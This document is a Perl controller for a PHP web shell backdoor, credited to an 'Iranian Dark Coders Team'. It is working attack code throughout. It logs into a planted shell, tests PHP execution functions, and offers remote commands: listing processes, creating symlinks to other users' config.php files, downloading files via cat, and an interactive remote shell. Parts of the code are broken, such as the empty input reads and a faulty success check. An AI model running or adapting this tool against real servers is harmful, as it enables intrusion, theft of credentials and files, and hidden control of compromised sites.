#IDC php BackDoor #Iranian Dark Coders Team #WwW.IDC-TeaM.NeT #Coded BY M.R.S.CO #We Are M.R.S.CO,N3O,UB313,Black.Hack3r #Friends : G3n3Rall,MR.CILILI,BlacK.King,Nafsh,b3hz4d,E2MA3N,Skote_Vahshat,Bl4ck.Viper,Mr.Xpr system(($^O eq 'MSWin32') ? 'cls' : 'clear'); print q ( __ __ __ | | _|_ {_ |_ _|| |__} _ _| | \ _ _ _ |/\|{-|_} __}| }{-|| |__}{_|{_|{|__/{_}{_}| --=[Web Shell BackDoor] +---++---==[Version : 1.1] +---++---==[Coded by : M.R.S.CO] +---++---==[WwW.IDC-TeaM.Net] --=[Iranian Dark Coders Team] ); use LWP::Simple; print "\nEnter Shell URL : "; chomp($url=); print "\nEnter UserName : "; chomp($usr=); print "Enter PassWord : "; chomp($pass=); print "\nStart analyze shell\n"; @fun=("system","passthru","exec","shell_exec"); $tf="false"; foreach(@fun) { $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('echo www.idc-team.net');"; if ($source =~ m/idc-team/i){ print "\nConected\nFor more information Enter \"help\""; do { print "\nWSB : "; chomp($cmd=); if ($cmd=~"help") { print q ( ================================================================ command Description ------- -------------------------- help The help command display the help menu getuid The 'getuid' command will display the user lpwd display the filename of the current working directory ps The 'ps' command display the list of running processes. shell It display the standard shell dir The 'dir' command List information about the FILEs download The 'download' command downloads a file from the remote machine sym The 'sym' command create a symlink ); }elsif ($cmd=~"getuid"){ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('id');"; print "\nUser id = $source"; }elsif ($cmd=~"dir"){ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ls -la');"; print "\n $source"; }elsif ($cmd=~"lpwd"){ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('pwd');"; print "\n$source"; }elsif ($cmd=~"ps"){ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ps -A');"; print "\n$source"; }elsif ($cmd=~"exit"){ exit 0; }elsif ($cmd=~"sym"){ print "Enter Target Path (/home/idc/public_html/config.php)\nEnter Target Path : "; chomp($target=); print "\nEnter symlink Path (/home/me/public_html/sym.txt)\nEnter symlink Path : "; chomp($sym=); $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('ln -s $target $sym');"; $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\'perl -e \"symlink('$target','$sym')\"\');"; $source=get $url."?usr=".$usr."&pass=".$pass."&idc=symlink('$target','$sym');"; print "\nSymlink \"$sym\" Was Created;)\n"; }elsif ($cmd=~"download"){ print "Enter File Path (/home/idc/public_html/test.zip)\nEnter File Path : "; chomp($ff=); print "\nEnter Save Path : "; chomp($fp=); $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_('cat $ff');"; open (fdl, '>>'.$fp); print fdl "$source"; close (fdl); print "\File \"$ff\" Was Downloaded to $fp\n"; }elsif ($cmd=~"shell"){ $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"uname -an\");"; print "\n$source"; do { print "\ncmd : "; chomp($cm=); $source=get $url."?usr=".$usr."&pass=".$pass."&idc=$_(\"$cm\");"; print "\n$source"; if ($cm=~"exit"){goto ou;} }while ($==1) }else{ print "\"$cmd\" Command NotFound 404;) \nFor more information Enter \"help\""; } ou:; }while ($==1) } $tf="true"; } if($tf="true") {print "Cant connect to server !!\n";}